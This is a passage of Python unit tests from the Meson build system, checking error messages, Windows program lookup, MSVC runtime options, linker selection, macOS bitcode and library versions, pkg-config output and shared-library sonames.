self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
@mock.patch.dict(os.environ)
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd.exe with args without searching
prog = ExternalProgram('cmd', command=['cmd', '/C'])
self.assertTrue(prog.found(), msg='cmd not found with args')
self.assertPathEqual(prog.get_command()[0], 'cmd')
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# If `.PY` is in PATHEXT, scripts can be found as programs
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
# Finding a script in PATH w/o extension works and adds the interpreter
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script with an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script-ext.py', command=[os.path.join(testdir, 'test-script-ext.py'), '--help'])
self.assertTrue(prog.found(), msg='test-script-ext.py with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script without an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script', command=[os.path.join(testdir, 'test-script'), '--help'])
self.assertTrue(prog.found(), msg='test-script with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# Force people to update this test whenever the list changes, and also test the full set of ignored libs
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
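# Helper shared by the linker-selection tests below: point the language's
# *_ld environment variable (and any deprecated alias of it) at `name`,
# detect the compiler, and assert that the linker Meson chose has the
# expected id. Skips if the named linker or a suitable compiler is missing.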
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
def test_compiler_checks_vscrt(self):
'''
Test that the correct VS CRT is used when running compiler checks
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
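# Nested helper: every compiler sanity-check command recorded in the Meson
# log must contain the expected CRT flag (e.g. /MDd or /MT).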
def sanitycheck_vscrt(vscrt):
checks = self.get_meson_log_sanitychecks()
self.assertTrue(len(checks) > 0)
for check in checks:
self.assertIn(vscrt, check)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=release'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=md'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mt'])
sanitycheck_vscrt('/MT')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mtd'])
sanitycheck_vscrt('/MTd')
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
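# Run `otool -L` on the given build artifact and return its
# (compatibility_version, current_version) pair as strings.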
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
@mock.patch.dict(os.environ)
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourselves.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
# See common/47 pkgconfig-gen/meson.build for a description of the case this test covers
with open(os.path.join(privatedir1, 'simple2.pc')) as f:
content = f.read()
self.assertIn('Libs: -L${libdir} -lsimple2 -lz -lsimple1', content)
with open(os.path.join(privatedir1, 'simple3.pc')) as f:
content = f.read()
self.assertEqual(1, content.count('-lsimple3'))
with open(os.path.join(privatedir1, 'simple5.pc')) as f:
content = f.read()
self.assertNotIn('-lstat2', content)
@mock.patch.dict(os.environ)
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
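# Glob helper that ignores Meson's private per-target directories, which
# end in '.p', so only the actual shared-library files/symlinks are counted.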
def glob_sofiles_without_privdir(self, g):
files = glob(g)
return [f for f in files if not f.endswith('.p')]
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
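# Shared implementation for the C/C++ std tests below: for every value the
# compiler offers for its 'std' option, configure with that value, verify the
# -std= flag shows up in the compile command, and build. Standards the
# detected compiler version is known not to support are skipped via the
# capability checks computed at the top.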
def _test_stds_impl(self, testdir, compiler, p: str):
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
